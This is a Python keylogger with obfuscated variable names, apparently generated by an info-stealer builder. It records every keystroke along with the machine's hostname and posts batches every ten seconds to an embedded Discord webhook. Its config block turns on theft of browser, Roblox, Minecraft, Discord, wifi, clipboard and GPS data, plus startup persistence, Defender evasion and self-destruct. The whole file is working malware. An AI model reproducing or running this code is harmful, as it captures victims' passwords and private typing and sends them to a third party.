import requests #line:1
import keyboard #line:2
import socket #line:3
import time #line:4
BUILDERVALUES ={"webhook":"https://discord.com/api/webhooks/1203454250001240095/PvZ2U0RhgT_KHRB-TZTv1qcXdwTPYFgvlG8VabGgYahm3OsmkeaKWLj1h7h3g35qK4a8","botname":"Scamming Scammers Bot","ping":True ,"pingtype":"Everyone","startup":True ,"defender":True ,"systeminfo":True ,"browser":True ,"roblox":True ,"obfuscation":True ,"minecraft":True ,"wifi":True ,"discord":True ,"self_destruct":True ,"clipboard":True ,"backupcodes":True ,"keylogger":"https://discord.com/api/webhooks/1213563735558586440/YL8z-w4AV_A6It1ip4gtQhhNaqU6HtULSVz--SH5D1A8Mgcq8I-jUi7fZDg9p-uYAtHR","icon":"https://cdn.discordapp.com/attachments/1141547949810257921/1204294384552517682/standard.gif?ex=65d4358b&is=65c1c08b&hm=984e3cac303359287b9f1c3c14ff2a1188e32f3973ceed6e890b362e21f4e251&","gps":True ,}#line:25
computer_name =socket .gethostname ()#line:28
shift_pressed =False #line:31
caps_lock_pressed =False #line:32
key_buffer =[]#line:35
special_keys ={"alt","ctrl","shift","fn","esc","home","end","insert","delete","backspace","tab","enter","caps lock","num lock","scroll lock","right shift","left shift","right ctrl","left ctrl","right alt","left alt","right arrow","left arrow","down arrow","up arrow"}#line:43
def send_to_discord (O0OOO0OO0000O0O00 ):#line:46
    for O0000O0OOO0OOO00O in O0OOO0OO0000O0O00 :#line:47
        O0O0OO0O00O0000OO ={'content':O0000O0OOO0OOO00O }#line:48
        requests .post (BUILDERVALUES ["keylogger"],json =O0O0OO0O00O0000OO )#line:49
def on_press (OO00OOO0O0OOOO00O ):#line:52
    global shift_pressed ,caps_lock_pressed #line:53
    try :#line:54
        OO000OOO0OOO0O00O =OO00OOO0O0OOOO00O .name #line:55
        if OO000OOO0OOO0O00O .lower ()in special_keys :#line:58
            OO000OOO0OOO0O00O =OO000OOO0OOO0O00O .upper ()#line:60
        else :#line:61
            if (not shift_pressed and not caps_lock_pressed )or (shift_pressed and caps_lock_pressed ):#line:63
                OO000OOO0OOO0O00O =OO000OOO0OOO0O00O .lower ()#line:64
            else :#line:65
                OO000OOO0OOO0O00O =OO000OOO0OOO0O00O .upper ()#line:66
        key_buffer .append (f"**{computer_name}** - **Key Pressed:** {OO000OOO0OOO0O00O}")#line:69
    except AttributeError :#line:71
        pass #line:72
def on_shift_press (O0OO0O000OOO0O0OO ):#line:75
    global shift_pressed #line:76
    shift_pressed =True #line:77
def on_shift_release (O00O0O0O0O00OO000 ):#line:80
    global shift_pressed #line:81
    shift_pressed =False #line:82
def on_caps_lock_press (O0O0OOO000000O000 ):#line:85
    global caps_lock_pressed #line:86
    caps_lock_pressed =not caps_lock_pressed #line:87
def process_buffer ():#line:90
    if key_buffer :#line:91
        send_to_discord (key_buffer )#line:92
        key_buffer .clear ()#line:93
keyboard .on_press (on_press )#line:96
keyboard .on_press_key ("shift",on_shift_press )#line:99
keyboard .on_release_key ("shift",on_shift_release )#line:100
keyboard .on_press_key ("caps lock",on_caps_lock_press )#line:103
try :#line:106
    while True :#line:107
        process_buffer ()#line:108
        time .sleep (10 )#line:109
except KeyboardInterrupt :#line:110
    pass 
